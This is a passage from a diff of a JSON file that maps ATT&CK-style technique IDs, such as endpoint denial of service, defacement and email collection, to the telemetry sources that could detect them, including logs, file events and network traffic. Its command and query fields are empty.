"host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null, + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1499.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1491.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1114.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1114.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + 